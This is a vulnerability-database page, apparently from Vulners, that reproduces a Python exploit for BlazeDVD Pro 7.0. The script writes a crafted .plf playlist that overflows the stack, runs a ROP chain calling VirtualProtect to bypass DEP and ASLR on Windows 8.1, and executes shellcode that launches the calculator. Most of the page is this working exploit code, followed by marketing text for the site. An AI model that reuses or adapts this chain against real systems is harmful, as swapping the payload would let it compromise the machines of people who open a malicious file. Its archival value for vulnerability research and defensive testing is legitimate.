Vulners
Lucene search
BlazeDVD Pro 7.0 - (.plf) Stack Based Buffer Overflow (Direct RET)
# BlazeDVD Pro v7.0 - (.plf) Stack Based Buffer Overflow (direct RET) - ALSR/DEP bypass on Win8.1 Pro
# Date: Mon, Aug 11 2014 12:58:06 GMT
# Exploit Author: Giovanni Bartolomucci
# Vendor Homepage: http://www.blazevideo.com/
# Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
# Version: 7.0.0.0
# Tested on: Windows 8.1 Pro
# h/t to corelanc0d3r and b33f for their tutorials
#!/usr/bin/python
import sys, struct
file = "calc.plf"
junk1 = "\x41"*260
neweip = "\x5b\x51\x32\x60"
junk2 = "\x41"*24
rop = "\x41\x47\x32\x60" # POP EBP # RETN [Configuration.dll]
rop += "\xb5\x59\x33\x60" # &(PUSH ESP # RET 0x0C) [Configuration.dll]
rop += "\xf6\x07\x33\x60" # POP EAX # RET [Configuration.dll]
rop += "\x91\x11\x11\x11" # Value to be subtracted, will become 0x000000080
rop += "\x39\x03\x33\x60" # POP ECX # RETN [Configuration.dll]
rop += "\x11\x11\x11\x11" # Value to subtract
rop += "\xda\x6d\x32\x60" # SUB EAX,ECX # RETN [Configuration.dll]
rop += "\x7d\x41\x32\x60" # XCHG EAX,EBX # XOR AL,60 # RETN [Configuration.dll]
rop += "\xf6\x07\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x47\x98\x31\x60" # Junk R address
rop += "\x47\x98\x31\x60" # POP EDX # ADD AL,BYTE PTR ES:[EAX] # NOP # NOP # NOP # NOP # NOP # MOV EAX,Configur.60346A70 # RETN [Configuration.dll]
rop += "\x51\x11\x11\x11" # Value to be subtracted, will become 0x000000040
rop += "\xf6\x07\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x11\x11\x11\x11" # Value to subtract
rop += "\x78\x8b\x30\x60" # SUB EDX,EAX # XOR EAX,EAX # CMP ECX,EDX # SETG AL # RETN 0x04 [Configuration.dll]
rop += "\x8c\xf0\x33\x60" # POP ECX # RETN [Configuration.dll]
rop += "\x41\x41\x41\x41" # Junk
rop += "\x0b\x17\x36\x60" # & Writable location [Configuration.dll]
rop += "\xee\x78\x32\x60" # POP EDI # RETN [Configuration.dll]
rop += "\x09\x48\x32\x60" # RETN (ROP NOP) [Configuration.dll]
rop += "\x65\x08\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\xcc\x42\x05\x64" # ptr to &VirtualProtect() [IAT MediaPlayerCtrl.dll]
rop += "\xed\xd6\x33\x60" # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll]
rop += "\xa2\x92\x32\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x90\x90\x90\x90" # NOP
rop += "\x28\xc3\x33\x60" # PUSHAD # RETN [Configuration.dll]
shellcode = ("\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63"
"\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72"
"\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30"
"\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78"
"\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24"
"\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E"
"\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7\xCC")
exploit = junk1 + neweip + junk2 + rop + shellcode
writeFile = open(file, "w")
writeFile.write(exploit)
writeFile.close()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Aug 2014 00:00Current
7.1High risk
Vulners AI Score7.1